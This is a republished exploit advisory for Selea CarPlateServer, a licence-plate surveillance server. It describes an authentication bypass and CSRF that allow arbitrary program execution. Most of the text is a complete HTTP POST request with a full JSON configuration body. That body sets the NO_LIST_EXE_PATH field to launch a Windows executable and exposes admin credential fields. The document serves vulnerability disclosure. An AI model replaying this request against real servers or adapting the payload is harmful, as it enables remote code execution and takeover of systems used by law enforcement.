selea carplateserver (cps) remote program execution

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selea carplateserver (cps) remote program execution Code Code...
# Exploit Title: Selea CarPlateServer (CPS) - Remote Program Execution # Date: 08.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution Vendor: Selea s.r.l. Product web page: Affected version: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: Our CPS (Car Plate Server) software is an advanced solution that can be installed on computers and servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences. Desc: The server suffers from an arbitrary win32/64 binary executable execution when setting the NO_LIST_EXE_PATH variable to a program of choice. The command will be executed if proper trigger criteria is met. It can be exploited via CSRF or by navigating to /cps/ endpoint from the camera IP and bypass authentication gaining the ability to modify the running configuration including changing the password of admin and other users. Tested on: Microsoft Windows 10 Enterprise SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5622 Advisory URL: 08.11.2020 -- POST /config_request?ACTION=WRITE HTTP/1.1 Host: localhost:8080 Connection: keep-alive Content-Length: 6309 Authorization: Basic ZmFrZTpmYWtl Accept: application/json, text/plain, */* LoginMode: angular User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75 AuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a content-type: application/json Origin: http://localhost:8080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8080/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 { "ACTIONS": { "ANIA_LIST_DAYS_NUM": "15", "ANIA_LIST_PWD": "", "ANIA_LIST_USER": "{B64valuehereommited}", "BLACK_LIST_COUNTRY": "", "EXACT_MATCH": "false", "FUZZY_MATCH": "true", "MINISTEROTRASPORTI_LIST_DAYS_NUM": "15", "MINISTEROTRASPORTI_LIST_ENABLE_CHECK": "0,1", "MINISTEROTRASPORTI_LIST_GET_OWNERS": "false", "MINISTEROTRASPORTI_LIST_PWD": "", "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE": "false", "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION": "false", "MINISTEROTRASPORTI_LIST_USER": "", "MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER": "false", "MINISTEROTRASPORTI_LIST_USE_VPN": "true", "MINISTEROTRASPORTI_LIST_VPN_PASSWORD": "", "MINISTEROTRASPORTI_LIST_VPN_USERNAME": "", "MINISTERO_LIST_DAYS_NUM": "24", "MINISTERO_LIST_PWD": "", "MINISTERO_LIST_USER": "", "NO_LIST_ENABLED": "true", "NO_LIST_ENABLE_EXE": "true", "NO_LIST_EXE_PATH": "C:/windows/system32/calc.exe", "NO_LIST_HTTP": "http://localhost:8080/$TRIGGER_EXE_VAR", "NO_LIST_HTTP_ENABLED": "false", "NO_LIST_SEND_TCP_ALARM": "", "PERMISSIVE_MATCH": "true", "WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO": "" }, "CAMERAINFO": { "BA__________": { "APPROACHING": "", "CustomCameraId": "", "CustomGateId": "", "DetectDesc": "ZSL", "DetectId": "", "Direction": "", "GPSLocation": "", "GateDesc": "3", "GateId": "", "LEAVING": "", "ZoneName": "", "setname": "false", "skip": "false" } }, "CONTEXT": { "BA__________": { "URL": [ "" ] } }, "DBMS": { "DB_NAME": "", "DB_PASSWORD": "", "DB_SERVER": "", "DB_TYPE": "sqlite", "DB_USERNAME": "", "ENCRYPT_DB": "false", "SQLITE_MAX_MB_RAM_CACHE": "-1" }, "EMAIL": { "DEST": "", "FROM_EMAIL": "", "FROM_NAME": "", "LOG_USER_SEARCH": "false", "MIN_EMAIL_TIME": "5", "PASSWORD": "", "PORT": "25", "SEND_EMAIL_ON_TAMPER": "false", "SERVER": "", "SSL": "false", "USERNAME": "", "XOAUTH2": "false" }, "EMAIL-XOAUTH2": { "refresh_token": "" }, "EZ_CLIENTS": { "PASSWORD": "", "SLAVES": "", "USERNAME": "", "USE_CNTLM": "false", "WANT_CTX": "false" }, "EZ_CLIENT_SCNTT": { "CTX": "true", "HOST": "", "PASSWORD": "", "PORT": "443", "USERNAME": "" }, "FTPSYNC": { "DELETE_OLD_SYNC_DAYS": "7", "JSON_CONFIG": "eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==", "SAVE_FTP_SEND_ERRORS": "true" }, "GLOBAL_HTTP_PROXY": { "CNTLM_ENABLED": "false", "EZ_ADDRESS": "", "EZ_PORT": "8999", "HOST": "", "NON_PROXY_HOST": "localhost|^(10|127|169\\.254|172\\.1[6-9]|172\\.2[0-9]|172\\.3[0-1]|192\\.168)\\..+", "PASSWORD": "", "PORT": "", "PROXY_ENABLED": "true", "USERNAME": "" }, "HTTPS": { "CERTIFICATE": "", "ENABLE_HTTP2": "true", "GET_CERTIFICATE_FROM_SELEA": "false", "PRIVATE_KEY": "", "ROOT_CERTIFICATE": "" }, "MASTER_CPS": { "ENABLED": "true", "MASTERS": "", "PASSWORD": "", "USERNAME": "" }, "PROXY_TCP": { "ENABLED": "false", "USE_HTTP_PROXY": "false" }, "REMOTE_LIST": { "ADDRESS": "", "ENABLED": "false", "PASSWORD": "", "PORT": "", "USERNAME": "" }, "REPORT": { "STATS_AGGREGATE": "true", "STATS_ENABLED": "false", "STATS_FREQ": "MONTH", "STATS_PATH": "", "STATS_SELECTED": "", "STATS_WEEK_DAY": "Mon" }, "SCNTT": { "LIST_A1_DAYS_LIMIT": "0", "SCNTT_PASSWORD": "", "SCNTT_PRIV_KEY_FILENAME": "", "SCNTT_PUB_CERT": "", "SCNTT_SYSTEM_DESC": "", "SCNTT_SYSTEM_ID": "", "SCNTT_USERNAME": "" }, "SETTINGS": { "ALLOW_FLASH_NOTIFICATIONS": "true", "AUTO_UPDATE": "true", "BACKUP_AT_SPECIFIC_HOUR": "-1", "BACKUP_DB_PATH": "", "BACKUP_EVERY_HOURS": "0", "CARPLATE_DETAILS_ENABLED": "false", "CHECK_EXPIRING_CARPLATES": "false", "CHECK_EXPIRING_CARPLATES_DAYS": "7", "CHECK_FILENAME_SYNTAX": "true", "DB_DELETE_DAYS": "90", "DB_DELETE_ENABLE": "false", "DB_DELETE_LOG_DAYS": "7", "DB_DELETE_OCR_FILE": "90", "DB_STATS_DELETE_DAYS": "90", "DISABLE_WHITELIST_REMOTE_DB_CHECK": "false", "ENCRYPT_IMAGES": "false", "FREE_DISK_LIMIT": "1000", "FRIENDLY_NAME": "test", "FTP_CUSTOM_PORT_RANGE": "false", "FTP_DOWNLOAD_DISABLED": "true", "FTP_ENABLED": "true", "FTP_EXTERN_IP": "", "FTP_EXTERN_IP_AUTO": "false", "FTP_LIST_DIR_DISABLED": "true", "FTP_MAX_PORT": "0", "FTP_MIN_PORT": "0", "FTP_PORT": "21", "FTP_USERS": "", "FTP_USE_FTPS": "true", "HTTP2_PORT": "8081", "HTTP_PASSWORD": "CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU", "HTTP_PORT": "8080", "HTTP_USERNAME": "admin", "IGNORE_CONTEXT_FOR_UNREADFAKE": "false", "IGNORE_IF_NOT_SYNTAX_MATCH": "false", "MILESTONE_CONNECTIONS": "5", "MILESTONE_ENABLED": "true", "MILESTONE_ENABLE_ACTIVE_CONNECTION": "false", "MILESTONE_PORT": "5666", "MILESTON_REMOTE_IP": "", "MILESTON_REMOTE_PORT": "8080", "MIN_LOG_LEVEL": "0", "PERIODIC_BACKUP_CONFIG": "0", "REMOVE_BLACK_LIST_ON_EXPIRE": "true", "REMOVE_NON_ALARM_CARPLATE": "false", "REMOVE_WHITE_LIST_ON_EXPIRE": "true", "SAVE_GATEWAY_SEND_ERRORS": "true", "SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS": "7", "SEND_EMAIL_ON_LOST_CONNECTION": "false", "SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME": "600", "SEND_EMAIL_ON_NO_PLATE_READ": "false", "SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME": "12", "SERVER_NTP_ON": "false", "SERVER_NTP_PORT": "123", "USE_HTTPS": "false" }, "VPNC": { "VPN_NET_NAME": "" }, "TCP_TEMPLATES": [] }

Selea carplateserver (cps) remote program execution Vulnerability / Exploit Source : Selea carplateserver (cps) remote program execution

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